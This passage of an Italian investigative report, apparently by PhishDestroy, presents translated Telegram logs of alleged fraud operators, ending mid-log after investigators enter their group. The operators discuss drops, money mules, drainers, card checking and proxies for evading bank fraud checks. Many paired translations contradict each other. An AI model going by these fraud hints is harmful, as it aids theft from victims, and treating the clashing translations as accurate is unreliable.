Bonya2026-02-14 14:33
Chi ha un "dreiner" sottoposto al test AML? Solo con DEP o Ready sul garanteQualcuno ha un drenatore per il test AML? Solo con deposito o già pronti per il garante?
B
Bonya2026-01-11 03:14
C'è qualcuno nel gruppo di Facebook e c'è un amico. Ho bisogno di rifornirmi di Facebook, il prezzo è trattabileC'è qualcuno che ha giocato su Facebook e ci sono delle scommesse. Bisogna ricaricare il conto Facebook; per il prezzo ci mettiamo d'accordo.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 messaggi) --
B
Bonya2025-12-05 12:04
Servono fatture, Payzaty, Cashfree, Eportal 3DSServono fatture, Payzaty, Cashfree, Eportal 3DS
B
Bonya2025-11-22 11:14
C'è qualcuno che garantisce la chat?C'è qualcuno che si occupa della chat qui?
-- Chat sull'arbitraggio del traffico (2 messaggi) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
Il canale Tg verrà dirottatoIl canale TG verrà chiuso
-- Raven CC checker (2 messaggi) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Chat di Vision Browser (2 messaggi) --
B
Bonya2025-11-14 16:47
Grazie.Grazie
B
Bonya2025-11-14 16:47
"vicen werk" in ru?"Vision Work" in russo?
-- 💬ONE|Chat (86 messaggi) --
B
Bonya2025-03-05 17:06
Ragazzi, indicatemi un negozio dove posso comprare dei cuscinetti.Ragazzi, indicatemi un negozio dove posso trovare delle piattaforme
B
Bonya2025-03-05 16:22
non riesco proprio nemmeno a fare una manicuresemplicemente non è nemmeno in grado di fare una manicure
B
Bonya2025-03-05 16:22
allo stesso modoallo stesso modo
B
Bonya2025-03-05 16:21
Cazzo, rispondimi: il mentore ha una chat con gli studenti o no?Cazzo, qualcuno mi può dire se il tutor ha una chat con gli studenti o no?
B
Bonya2025-03-05 16:10
e di chi è questo?E chi è "ts"?
B
Bonya2025-03-05 15:44
Non è difficile, ma qui non ci sono manuali completi, solo guide.Lì non è difficile, ma qui non ci sono manuali completi, solo quelli degli istruttori
B
Bonya2025-03-05 15:42
In sostanza, sì, se sai come fare.In sostanza, sì, se sai come si fa
B
Bonya2025-03-05 15:42
mezza giornataper mezza giornata
B
Bonya2025-03-05 15:42
Il primo ne ha 600, ma lui non risponde.Per i primi 600 non risponde
B
Bonya2025-03-05 15:41
Se hai i soldi, prendi quello che costa 200 dollari.Se hai i soldi, prendi quella che chiede 200$.
B
Bonya2025-03-05 13:55
Chi è bravissimo a spiegare che c'è una chat per gli studenti?C'è una chat per gli studenti del corso di fantascienza?
B
Bonya2025-03-03 15:10
AssegniScontrini
B
Bonya2025-03-03 15:10
Quello che passa l'aspirapolvereChe passa l'aspirapolvere
B
Bonya2025-03-03 15:10
CapitoC'è
B
Bonya2025-03-03 15:10
Probabilmente ci sono anche delle "puttane" nel mondo del software.Ma qui ci sono sicuramente delle bug nel software
B
Bonya2025-03-03 15:09
EraC'era
B
Bonya2025-03-03 15:09
Oh, che bello.Oh, questo sì che è forte!
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriue ru ru
B
Bonya2025-03-03 15:09
E vengono raccoltiE li raccolgono
B
Bonya2025-03-03 15:09
Tip se ne sta lì seduto a strappare le confezioni, cazzoTipo se ne sta lì a sgranocchiare patatine
B
Bonya2025-03-03 15:04
Perché ci sono targhe ucraine?E perché i numeri in ucraino?
B
Bonya2025-03-03 15:03
Ho detto "kc".Ho detto "kts"
B
Bonya2025-03-03 15:03
Ho capito.Ho capito
B
Bonya2025-03-03 15:03
Se la cosa si complica, perderai la tua bombetta.Se ti capita di trovarti qui, ti salterà il coperchio
B
Bonya2025-03-03 15:03
Cazzo, vediamo quante volte riuscirai a far girare il rekul su Facebook mentre io tolgo il roux dal fuoco.Cazzo, dai, fammi un confronto: quante volte lancerai il ricalcolo su Facebook mentre io faccio uno screenshot?
B
Bonya2025-03-03 15:02
Per una escortServizio di accompagnamento
B
Bonya2025-03-03 15:02
Quei tipi hanno un modo di fare da far venire voglia di prendere a pugni quel fottuto coglione.Per quei tipi, lo sviluppo è solo per far partire quella fottuta sega
B
Bonya2025-03-03 15:02
Cazzo, qui ci sono solo "wokers".Cazzo, qui ci sono solo dei lavoratori manuali
B
Bonya2025-03-03 15:02
Che tipo di tavoliQuali tavoli
B
Bonya2025-03-03 15:01
Se hai una bella voce, i 30 saranno tuoi.30 saranno tuoi se la voce è bella
B
Bonya2025-03-03 15:01
Ci sono più soldiLì ci sono più soldi
B
Bonya2025-03-03 15:01
Vieni a lavorare nella mia azienda.Vieni a lavorare da me al centro culturale
B
Bonya2025-03-03 15:00
NoNo
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Non so come funziona un replay+ Non ci capisco niente di questi discorsi
B
Bonya2025-03-03 14:59
È difficile trovare delle buone gocce.È difficile trovare dei drop decenti
B
Bonya2025-03-03 14:58
Oppure esiste una versione 1.0?Oppure c'è la versione 1.0
B
Bonya2025-03-03 14:58
Qui c'è solo un phish 2.0.E qui ci sono i fisci a 2,0 A
B
Bonya2025-03-03 14:58
O meglio, meglio 1.0 che 2.0.Beh, meglio 1.0 che 2.0
B
Bonya2025-03-03 14:57
Con i mammutCon i mammut
B
Bonya2025-03-03 14:57
La versione 2.0 non funziona se te ne stai lì a perdere tempo.2.0: non va bene stare lì a cazzeggiare
B
Bonya2025-03-03 14:57
Sono più un tipo da traffico.Non sono più io quello con più traffico
B
Bonya2025-03-03 14:57
Ecco "The X's" di RooEcco le X sulla mano
B
Bonya2025-03-03 14:56
Ma questi non sono slogan pubblicitariMa non si tratta di team pubblicitari
B
Bonya2025-03-03 14:56
È vero. Conosco qualcuno a cui succede.(Lo fanno) Ho dei conoscenti
B
Bonya2025-03-03 14:56
Non è un problema, se sai come guadagnare 400-500 al giorno.Ma dai, se sai come fare, ci sono tipi che ne fanno 400-500 al giorno
B
Bonya2025-03-03 14:55
Allora, qual è il problema?)Beh, e allora, cosa mi sono dimenticato qui? )
B
Bonya2025-03-03 14:55
C'è un link al manualeLì c'è un link al manuale
B
Bonya2025-03-03 14:54
Sono proprio questo il tipo di maniEcco che si scateneranno
B
Bonya2025-03-03 14:54
Cazzo, sbavando e facendo gli occhi dolci solo per farsi dare una cazzo di mano.Cazzo, per eccitarti puoi sbavare e spalancare gli occhi in tutte le direzioni
B
Bonya2025-03-03 14:54
Beh, qual è il problema? È lo stesso lavoro.Beh, allora qual è il problema? È lo stesso lavoro
B
Bonya2025-03-03 14:53
Ci vorrà un mese per arrivare nella zonaCi porteranno nella zona entro un mese
B
Bonya2025-03-03 14:53
E non c'è nessun posto dove andare. Se hai un po' di cervello, lo capirai da solo. Altrimenti, fuori di qui.E poi non c'è niente da fare qui: se ci metti un po' di testa, capisci che non c'è proprio niente da fare qui
B
Bonya2025-03-03 14:53
Cosa vuoi?Ma cosa volevi?
B
Bonya2025-03-03 14:53
PubblicitàPubblicità
B
Bonya2025-03-03 14:52
Sono qui da due giorni e la versione 2.0 non mi interessa. Pensavo fosse una figata.Sono qui da due giorni e la versione 2.0 non mi interessa; pensavo fosse una cosa divertente
B
Bonya2025-03-03 14:52
E goditi un mammutE allevare un mammut
B
Bonya2025-03-03 14:52
Usa la testa per pensare a cosa dire.Mi sono fermato un attimo a pensare a cosa rispondere
B
Bonya2025-03-03 14:52
Non ci sono segretiQui non ci sono segreti
B
Bonya2025-03-03 14:52
Cosa ti regalerà?Cosa vi darà
B
Bonya2025-03-03 14:52
Beh, a che serve se il manuale contiene tutte le stesse informazioni?Ma allora che senso ha se nel manuale ci sono tutte quelle informazioni?
B
Bonya2025-03-03 14:51
Avrà tempo per rispondere a tutti i vostri cazziCome diavolo faremo a rispondere a tutti voi?
B
Bonya2025-03-03 14:51
Che allenamento!Che tipo di pratica?
B
Bonya2025-03-03 14:51
Ci sono 100 persone lì dentro.Cavolo, lì ce ne sono 100 a testa
B
Bonya2025-03-03 14:51
Perché non mi dai un po' di soldi e io ti darò il manuale del morsetto?Magari mi mandate un po’ di soldi, così vi do il manuale dal fissaggio
B
Bonya2025-03-03 14:50
Nel fissareNel fissaggio
B
Bonya2025-03-03 14:50
Non c'è bisogno di un manuale per insegnarti tutto.E chi se ne frega della formazione, c'è il manuale, no?
B
Bonya2025-03-03 14:50
La versione 2.0 è quella che è.2.0 com'era, così è
B
Bonya2025-03-03 14:50
Ma che cazzo di problema c'è?Ma che cavolo, che rompicoglioni questo problema!
B
Bonya2025-03-03 14:48
L'hai fatto tu stesso?Ci hai già provato tu?
B
Bonya2025-03-03 14:48
Non è una folliaNon funziona proprio
B
Bonya2025-03-03 14:48
C'è un accesso all'lkC'è un omicidio in LC
B
Bonya2025-03-03 14:48
Che succede con l'lk?Che tipo di lavoro si fa in LC?
B
Bonya2025-03-03 14:48
Quale di questi siete voi "coglioni", come dite voi?Da chi cazzo li hai presi, come hai detto?
B
Bonya2025-03-03 14:47
Non capisco cosa intendi dire qui.Qui non ho capito bene cosa hai detto
B
Bonya2025-03-03 14:46
Se hanno effettuato l'accesso, bene.Se entrano nell'LC, allora ZBS
B
Bonya2025-03-03 14:46
Beh, effettuano l'accesso?Allora, entrate nel profilo?
B
Bonya2025-03-03 14:45
Non so come facciano a girarli.Non ne ho idea, non capisco come si facciano quelle foto
B
Bonya2025-03-03 14:45
Cagnolini da dare per spacciati?Vuoi iscriverti alla newsletter?
B
Bonya2025-03-03 14:45
Cazzo, c'è un cazzo di pulsanteE poi chi se ne frega, vai a fare altro
B
Bonya2025-03-03 14:42
Me lo verso da soloSono io a versarlo
B
Bonya2025-03-03 14:42
Mi sono reso conto, cazzo, che non è roba da coglioni.Cazzo, l'ho capito, ma non me ne frega un cazzo
B
Bonya2025-03-03 14:41
Amico, qui non vendono niente con le schede prepagate, è una scheda per lo stipendio.Amico, qui non vendono niente con i buoni: qui i buoni servono per pagare
B
Bonya2025-03-03 14:41
Ho capito, non c'è un posto dove versarloHo capito, qui non c'è un posto dove versarlo
B
Bonya2025-03-03 14:40
Regular 2.0, credo.I soliti 2.0, più o meno
B
Bonya2025-03-03 14:40
Non è che stiano intasando il trafficoQuindi qui non generano traffico
-- FbStor - Chat dei webmaster di successo! (23 messaggi) --
B
Bonya2025-02-26 07:51
Beh, fai quello che cazzo ti pare, faccia da schifo.Beh, che importa chi c'è lì?
B
Bonya2025-02-26 07:50
Un ragazzo delle medie, 200₽.Beh, alla studentessa 200₽, dai
B
Bonya2025-02-26 07:50
FunzioneràAndrà bene
B
Bonya2025-02-26 07:50
In strada incontrerai un senzatetto.Per strada, se incontri un senzatetto, lascialo stare
B
Bonya2025-02-26 07:50
Quindi ognuno crede nel proprio volto, indipendentemente da chi sia.Allora tutti si verificano con la propria foto, chi se ne frega di chi sia
B
Bonya2025-02-26 07:50
In faccia.A proprio rischio e pericolo
B
Bonya2025-02-26 07:49
Ma il fatto è che, comunque sia, l'ho fatto già 10 volte.Ma in realtà, chi se ne frega, ho tipo 10 account verificati
B
Bonya2025-02-26 07:49
Allora dimmi, stai solo sparando sciocchezze.Allora, dimmi, stai spargendo pettegolezzi?
B
Bonya2025-02-26 07:49
PuoiÈ possibile
B
Bonya2025-02-26 07:49
In faccia.A proprio rischio e pericolo
B
Bonya2025-02-16 20:26
invece di mandarli a puttane con qualche tipo di addestramento e facendoli andare in mezzo al traffico.e non, tipo, fregarli con qualche corso e incanalare il traffico verso di loro
B
Bonya2025-02-16 20:25
le solite cose, tipo YouTube ecc.i normali canali come UBT, TT, YouTube e così via
B
Bonya2025-02-15 17:31
XzNon so
B
Bonya2025-02-15 17:31
Con il pretesto della formazioneCon il pretesto della formazione
B
Bonya2025-02-15 17:31
Verso i canaliSui canali
B
Bonya2025-02-15 17:31
È solo il viavai della gente.È solo che il traffico generato da quelle persone è davvero intenso
B
Bonya2025-02-15 17:31
Quindi quel tizio dice di iscriversi a tutti i suoi canaliAllora quel tipo dice di iscriversi a tutti i suoi canali
B
Bonya2025-02-15 16:36
Non devi scrivereHuinyu suggerisce di non scrivere
B
Bonya2025-02-06 15:11
Se non conosci le basi su come versare, finirai per...Se non conosci le basi, come farai a fondere?
B
Bonya2025-02-06 15:11
C'è un pulsante per cambiare l'aipi, dovresti almeno cercarlo su Google.Cliccando su quel pulsante cambia l'IP, prova a cercarlo su Google
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
È possibile modificare l'aipi che si trova lì ruotandolo.Lì è possibile modificare la rotazione dell'API
B
Bonya2025-02-06 15:09
Perché 1? Beh, è lo stesso cellularePerché 1? Ma sono i cellulari!
-- CryptoGrab - Chat di mutuo aiuto (10 messaggi) --
B
Bonya2025-02-06 15:31
Non è così sempliceNon è poi così semplice
B
Bonya2025-02-06 15:31
Facile.Izi
B
Bonya2025-01-23 20:30
Nessun esempioNon c'è un solo esempio
B
Bonya2025-01-23 20:30
Non è affatto divertente che su Internet non sia riuscito a trovare nessuna pubblicità sui test per l'AML.Ma non è da ridere che non abbia trovato proprio nessuna pubblicità dei test AML su Internet
B
Bonya2025-01-23 17:20
Sull'AML non c'è proprio nulla.Su AML non c'è proprio niente
B
Bonya2025-01-23 17:20
Ho provato AML su Facebook per trovare anche pacchetti americani, anche quelli meno conosciuti e persino quelli vecchi che non si trovano su InternetHo provato a cercare su Facebook informazioni sull'AML, ma non ho trovato nemmeno in rete fonti attendibili, nemmeno quelle più datate.
B
Bonya2025-01-23 17:19
Allora, che tipo di offerta hai in mente?Beh, in generale, che tipo di offerta hai in mente?
B
Bonya2025-01-23 17:16
Usi AML?E tu, sai giocare a AML?
B
Bonya2025-01-21 20:38
Chiunque si occupi di Facebook vorrebbe chiarire un paio di puntiC'è qualcuno che gestisce la pagina Facebook? Vorrei chiarire un paio di cose
B
Bonya2025-01-20 11:08
Qualcuno ha degli esempi di creos per AML?Qualcuno ha degli esempi di creo per AML?
-- Rolex | chat generale (28 messaggi) --
B
Bonya2024-09-11 15:29
Cosa stanno facendo i lituani su quale campo?E la Lituania su quale campo la stanno massacrando?
B
Bonya2024-09-11 15:21
Stai scherzando con la vite?Ma che cazzo stai combinando?
B
Bonya2024-09-11 15:20
È solo che questi siti sono molto restrittivi e ci vuole un sacco di tempo per capirci qualcosaÈ solo che queste piattaforme limitano tantissimo il lavoro e sono una vera rottura di palle
B
Bonya2024-09-11 15:19
Ho in mente un'idea. Se la realizzassero, sarebbe fottutamente fantastico.Mi è venuta in mente un'idea e l'ho scritta lì; se la realizzassero, sarebbe una figata pazzesca
B
Bonya2024-09-11 15:19
Non vedo molti segni di presenza nella finca.Non vedo proprio nessun logo sulla Finka
B
Bonya2024-09-11 15:19
C'è una situazione davvero incasinata con tutte le sale.Ma dai, quei tipi hanno un gran casino con tutte le piattaforme
B
Bonya2024-09-11 15:16
È proprio quello che intendo dire, è come un guado su un altro guado.Beh, è proprio come dico io: una truffa dopo l’altra
B
Bonya2024-09-11 15:15
Non riesco a capire cosa stia andando meglio adesso; vedo che in Finlandia nessuno sta lavorando.Non riesco proprio a capire cosa funzioni meglio in questo momento; vedo che a tutti sembra che qualcosa non funzioni con la finanza.
B
Bonya2024-09-11 15:08
Beh, le probabilità di avere fortuna con i proxy sono 50/50.Beh, 50/50, se si ha fortuna con i proxy
B
Bonya2024-09-11 15:07
Ma, giusto per farti capire, al giorno d'oggi, con i proxy di lusso, anche su Viber, quando accedi, il sistema va in tilt.Ma, per capirci, adesso con i proxy di lusso, anche su Viber, quando accedi, c'è il frodi
B
Bonya2024-09-11 15:07
Beh, non so nulla delle lattine dell'UE.Beh, di banche europee non ne capisco un bel niente
B
Bonya2024-09-11 15:07
In lkNel lk
B
Bonya2024-09-11 15:06
Un tempo le gastronomie avevano 10 celle frigoriferePrima le vernici a 10 strati resistevano
B
Bonya2024-09-11 15:06
Beh, anche la 922 è a quota 1 e tiene la posizione.Beh, anche il 922 entra e ne tiene uno
B
Bonya2024-09-11 15:05
Anche solo il fatto di andarci dopo 3 visite li spaventa a morte.Anche in privato, dopo tre tentativi, li frega
B
Bonya2024-09-11 15:05
Se 1 proxy, 1-2 bancheSe 1 proxy corrisponde a 1-2 banchi di corrente
B
Bonya2024-09-11 15:05
Beh, dipende dalla bancaBeh, dipende dalla banca
B
Bonya2024-09-11 15:04
I rappresentanti sono spesso dei veri e propri schifosi in quelle sciocchezze alla laksheriNei siti porno, i proxy sono spesso infetti
B
Bonya2024-09-11 08:44
Sta dormendo?E lui sta dormendo?
B
Bonya2024-09-11 08:40
Oh, è un'idea fantastica.È stato l'ZBS a inventarlo
B
Bonya2024-09-11 08:40
Non c'è forse una specie di mercatino delle pulci o qualcosa del genere?E poi, da loro non ci sono quei mercatini dell'usato qua e là
B
Bonya2024-09-11 08:40
Che casinoHuevo
B
Bonya2024-09-11 08:39
BilyaBilya
B
Bonya2024-09-11 08:39
Ci sono delle chat room?E lì ci sono delle chat?
B
Bonya2024-09-11 08:38
Qualcuno lo sa?Qualcuno lo sa?
B
Bonya2024-09-11 08:38
Le persone che vivono in una finca usano TG?In Finlandia la gente usa Telegram?
B
Bonya2024-09-10 12:14
Grazie.Grazie
B
Bonya2024-09-10 12:13
Che ora è in Finlandia?Che ora è adesso in Finlandia?
-- Attualità/Verifiche/Guadagni💃🛍 (37 messaggi) --
B
Bonya2024-06-16 17:17
Non vedo nessuno che la difenda con veemenzaNon vedo qui nessuno che la difenda con fervore
B
Bonya2024-06-16 17:17
Beh, in fin dei conti la situazione è stata spiegata e poi ognuno fa la propria scelta, e il fatto che solo l'amministratore Pasha la stia difendendo la dice lunga.Beh, ho spiegato la situazione; ora sta a ciascuno decidere da sé, e il fatto che a difenderla ci sia solo l’amministratore Pasha la dice lunga
B
Bonya2024-06-16 17:15
E non ha pagato di nuovoE anche questa volta non ha pagato
B
Bonya2024-06-16 17:15
No, ce l'ha trasferito lei, ma poi non avevamo il conto principale su cui trasferire il denaro, quindi, come ultima risorsa, abbiamo scritto a Vika.No, lei l'ha scaricata su di noi, ma noi non avevamo un metodo di pagamento principale per trasferire i soldi e abbiamo scritto a Vika come ultima risorsa
B
Bonya2024-06-16 17:14
All'inizio anche noi stavamo bene, ma ultimamente i tuoi soldi spariscono continuamente.All'inizio anche da noi andava tutto bene, ma ultimamente i vostri soldi spariscono continuamente
B
Bonya2024-06-16 17:14
Sto facendo spam? Sono qui a dire la verità alla gente. Puoi cancellarlo pure. Fai sapere alla gente come lavori.E io sono uno spammer? Sto qui a dire la verità alla gente; puoi cancellare questo post, ma cosa cambierà? Che la gente sappia come lavorate.
B
Bonya2024-06-16 17:13
Quando ne hai uno di questiQuando vi capiterà una cosa del genere
B
Bonya2024-06-16 17:13
È quindi giunto il momento di riflettereQuindi è il momento di riflettere
B
Bonya2024-06-16 17:13
Anche noi collaboriamo con nei da molto tempo e questa è la seconda volta che si verifica una situazione del genereAnche noi lavoriamo con lei da molto tempo e questa è già la seconda volta che si verifica una situazione del genere
B
Bonya2024-06-16 17:13
E ha registrato i gs e ha detto: “Sai come funziona”.E lei ha preso nota e ha detto che sapete come funziona
B
Bonya2024-06-16 17:13
È proprio così, partiamo dall'inizio: abbiamo preso la sua carta per prelevare dei soldi, abbiamo versato 60k, lei è andata a prelevarli e ci ha scritto che i soldi non c'erano perché il bancomat le aveva inghiottito la carta, e basta: abbiamo buttato via 60k.Ecco, proprio così: cominciamo dall’inizio. Le abbiamo dato la carta per trasferire 60k; lei è andata a prelevarli e ci ha scritto che i soldi non c’erano, perché a quanto pare il bancomat le aveva trattenuto la carta. Insomma, abbiamo semplicemente buttato via 60k.
B
Bonya2024-06-16 17:11
Non è lei che ci tiene in pugnoE non siamo noi da lei?
B
Bonya2024-06-16 17:11
Anche se ci hanno rubato 60kAnche se ci hanno rubato 60k
B
Bonya2024-06-16 17:11
Normale? Abbiamo spiegato tutto qui. Stai dicendo che siamo degli idioti.Normali? Abbiamo spiegato tutto qui, e voi dite che siamo degli idioti
B
Bonya2024-06-16 17:10
La stai difendendoLa difendete
B
Bonya2024-06-16 17:10
Ha ancora i nostri soldiI nostri soldi sono rimasti da lei
B
Bonya2024-06-16 17:10
Tutti quantiTutto
B
Bonya2024-06-16 17:10
Le avevano dato 60.000, ma lei ha detto che non c'erano soldi.Quando gli hanno versato 60k, ha detto che i soldi non ci sarebbero stati
B
Bonya2024-06-16 17:10
Descritto*Descritto*
B
Bonya2024-06-16 17:10
Vi è stata illustrata l'intera situazioneTi hanno spiegato tutta la situazione
B
Bonya2024-06-16 17:09
Chi è quella che molla? Lei o noi.Chi è la "dropovod", lei o noi?
B
Bonya2024-06-16 17:09
Abbiamo 60.000 in banca. Dove sono i soldi?Hanno versato 60k, dove sono finiti i soldi?
B
Bonya2024-06-16 17:09
Ti è stata spiegata chiaramente la situazione, indipendentemente dal tuo sesso.Qualunque donna ti abbia spiegato tutta la situazione, il sesso non ha alcuna importanza
B
Bonya2024-06-16 17:08
Preleva 60.000 e chiudi la giornata.Fare 60k e smetterla
B
Bonya2024-06-16 17:08
Oppure vaffanculo, entro certi limiti.O che cazzo vi passa per la testa, entro limiti ragionevoli
B
Bonya2024-06-16 17:08
La gente non ha soldi per pagareCon cosa dovrebbero pagare le persone?
B
Bonya2024-06-16 17:08
E dice che la carta si è danneggiata e che ha finito i soldi.E dice che la carta è bloccata, non ci sono soldi
B
Bonya2024-06-16 17:08
A un uomo sono stati versati 60 grand, lei è andata a sparare.Le hanno versato 60k e lei è andata a prelevarli
B
Bonya2024-06-16 17:07
Allora, mi dirai come stanno le cose.Allora, spiegami con precisione
B
Bonya2024-06-16 17:07
Allora, chi cazzo è da biasimare, chi è quello che mi ha fregato?Allora, chi cazzo è il colpevole, chi è l'idiota, io?
B
Bonya2024-06-16 17:07
Non hai niente da dire?Non c'è niente da dire?
B
Bonya2024-06-16 17:07
Oppure non riuscivo a digitare quel cazzo di codice PIN.Oppure, cazzo, non è riuscita a digitare quei pin con le mani storte
B
Bonya2024-06-16 17:06
Ma come cazzo fa un bancomat a incastrare la carta?Ma come cazzo ha fatto il bancomat a ingoiare la carta?
B
Bonya2024-06-16 17:06
SucchiatoriSottopressioni
B
Bonya2024-06-16 17:06
E tu ti stai eccitando da morire per lei.E voi che cazzo ci fate qui a scaricare per lei?
B
Bonya2024-06-16 17:06
Voi, cazzo, che vi viene naturale, siete dei fottuti idioti. C'è una donna, cazzo, seduta qui che sta cercando di prelevare i suoi soldi e la sua carta è stata inghiottita dal bancomat.Ma cazzo, siete proprio dei coglioni, avete una stronzata che vi sta dando sui nervi, vi viene in mente che il bancomat le ha trattenuto la carta
B
Bonya2024-06-16 16:40
@kysia1987 non funziona, è una truffa: ha dato un calcio volante e si è fuso con 60k@kysia1987 non funziona, è una truffa: ha fatto un piccolo calo e poi è sparita con 60k

MONETTI ESCOBAR: Il capo silenzioso

In netto contrasto con i 261 messaggi di Bonya, MONETTI ne ha solo 10 messaggi pubblici — il tutto in un unico thread su Chat TraFFeeQ (Arbitraggio del traffico ADS/SEO nero), in difesa di un collega:

Chat TraFFeeQDicembre 2025
"Un uomo fa il suo lavoro, viene pagato per farlo — vuoi discuterne?"
Una persona fa il proprio lavoro, viene pagata per farlo, che c'è da discutere?)
Considerare l’attività criminale come “un lavoro come un altro”
Chat TraFFeeQDicembre 2025
"Non c'è niente da discutere con te"
Con te non c'è niente da discutere
Autorità sprezzante — mentalità da capo, al di sopra di ogni discussione
Chat TraFFeeQDicembre 2025
"Ci sono un sacco di cose da fare oltre a te!"
Senza di te ho comunque qualcosa da fare)
Implica diverse operazioni simultanee che richiedono la sua attenzione

I gruppi Telegram di MONETTI dicono il resto: Medusa Google Ads (frode PPC di tipo "black-hat"), un Canale Deepfakes (strumenti sintetici utilizzati a fini fraudolenti), e MARLBORO CHAT (privato, sconosciuto). L'abbonamento a Telegram Premium, orario di lavoro 24 ore su 24, 7 giorni su 7, e "Есть предложение" ("Ho una proposta") La biografia professionale del soggetto dipinge l'immagine di una persona che considera la criminalità informatica come un'attività a tempo pieno.

MONETTI ESCOBAR: Registro completo dei messaggi (10 messaggi)
MONETTI ESCOBAR (@monettiescobar) — Cronologia completa dei messaggi tradotti
-- TraFFeeQ Chat | Arbitraggio del traffico | Black ADS/SEO | (9 messaggi) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Lascia perdere!Lascia perdere!
ME
MONETTI ESCOBAR2025-12-06 20:42
Un uomo fa il proprio lavoroL'uomo sta svolgendo il proprio lavoro
ME
MONETTI ESCOBAR2025-12-06 20:42
Nessuna aggressivitàNessuna aggressività
ME
MONETTI ESCOBAR2025-12-06 20:40
Non preoccuparti nemmeno di questoNon preoccuparti nemmeno di questo
ME
MONETTI ESCOBAR2025-12-06 20:39
Parla con lui, fratello. Non gli è vietato farlo.Parla con lui, amico, non gli è stato vietato di farlo
ME
MONETTI ESCOBAR2025-12-06 20:39
(Ci sono un sacco di cose da fare oltre a te!)C'è altro da fare oltre a te!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Non c'è nulla di cui discutere con teCon te non c'è niente da discutere
ME
MONETTI ESCOBAR2025-12-06 20:38
È scritto accanto al suo soprannome. Non c'è bisogno di cliccarci sopra, lo vedrai subito.Accanto al suo nickname c'è scritto: "Non usare il 'tu', leggi bene".
ME
MONETTI ESCOBAR2025-12-06 20:38
Quell'uomo fa il suo lavoro, viene pagato per farlo (mi piacerebbe discuterne)Una persona fa il proprio lavoro, viene pagata per questo, se ti va ne parliamo)
-- Medusa | Google Ads | Chat (1 messaggio) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Profilo Telegram di MONETTI ESCOBAR
Screenshot 2 — Profilo Telegram di MONETTI.
Profilo Telegram di Bonya
Screenshot 3 — Il profilo di Bonya. Da notare DC2 (Amsterdam).

Sezione 7: La stanza del panico

Dopo che PhishDestroy ha avuto accesso al gruppo degli operatori tramite il bot di Telegram esposto, si è verificato il seguente scambio. Il log della chat riportato di seguito è stato tradotto in inglese, con il testo originale in russo riportato in corsivo. L'identità utilizzata per l'accesso è stata oscurata.

Gruppo operatori — "Idr card" — Cronologia completa della chat (61 messaggi)
— REDACTED si è collegato tramite un token bot esposto —
R
OMISSIS25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
ChiChi
B
Bonya25-03-2026 13:07:14
XzNon so
R
OMISSIS25-03-2026 13:07:14
Ciao, basta andare a salvare i tuoi dati, aspetta un minuto
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Ma che cazzo!Ma che cazzo
B
Bonya25-03-2026 13:07:27
CazzoCazzo
B
Bonya25-03-2026 13:07:28
Ecco chi èChi è chi?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Ah, sì.Ahahah
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Ma che cazzo?Ma che cavolo...
B
Bonya25-03-2026 13:07:53
Il bot è stato compromessoHanno hackerato la bot
B
Bonya25-03-2026 13:08:16
Mi hanno detto che la nostra difesa è un disastro.A proposito, mi hanno detto che da noi la sicurezza è davvero pazzesca
B
Bonya25-03-2026 13:08:22
Beh, c'è un tipoBeh, c'è un tizio lì
B
Bonya25-03-2026 13:08:43
È come far passare un bot attraverso un attacco di phishing.Da noi, rompere il bot tramite Fish è facile come battere un dito contro l’altro
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[OMISSIS].[OMISSIS]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Chi è quello?Chi è quello?
B
Bonya25-03-2026 13:10:29
Controlla il tuo profilo.Dai un'occhiata al tuo profilo
B
Bonya25-03-2026 13:10:32
È un hackerQuesto è un hacker
B
Bonya25-03-2026 13:10:35
Letteralmente.In senso letterale
B
Bonya25-03-2026 13:10:41
Ha tradotto ciò che sta canalizzandoHanno tradotto quello che ha scritto sul canale
B
Bonya25-03-2026 13:10:55
[OMISSIS — Bonya copia e incolla il messaggio dal canale che ha segnalato il proprio dominio, nel tentativo di identificare chi li abbia segnalati]
B
Bonya25-03-2026 13:12:19
Allora, ehm...Beh, vabbè
B
Bonya25-03-2026 13:12:23
Non ne ho la più pallida idea di chi sia.Chi cazzo lo sa chi sia
B
Bonya25-03-2026 13:12:25
Ma non per sempreMa non per il meglio
B
Bonya25-03-2026 13:12:47
@devosus, pensiamo alla difesa prima di farci fare a pezzi.@devosus, pensa alla difesa prima che ci facciano il culo
Nota dell'editore: Bonya se lo sente arrivare. Supponiamo che sia russo e che consideri "patriottico" truffare l'Ucraina. E allora che dire dell'Indonesia — un Partner del BRICS dall'ottobre 2024 (Vertice di Kazan)? È forse patriottico anche derubare i cittadini dei propri alleati? I truffatori della CSI sono ladri che non fanno distinzioni, privi di intelligenza e di lealtà. Leggete le nostre altre inchieste in cui abbiamo documentato casi di azione penale Per operatori simili, il risultato è sempre lo stesso.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Sì, lo vedo anch'io.Sì, lo vedo
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Vaffanculo.Ma che cazzo stai dicendo?
B
Bonya25-03-2026 13:13:09
Beh, nemmeno essere prosciugati è poi così emozionante.Beh, nemmeno stare incollati l'uno all'altro è granché
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Non farà nullaNon farà nulla
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Cosa farà?Cosa rivelerà?
D
Devoys25-03-2026 13:13:26
di cosa si trattache cos'è
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Sì, si è unito un ragazzoE lui si è unito a noi
D
Devoys25-03-2026 13:13:34
da doveda dove
B
Bonya25-03-2026 13:13:35
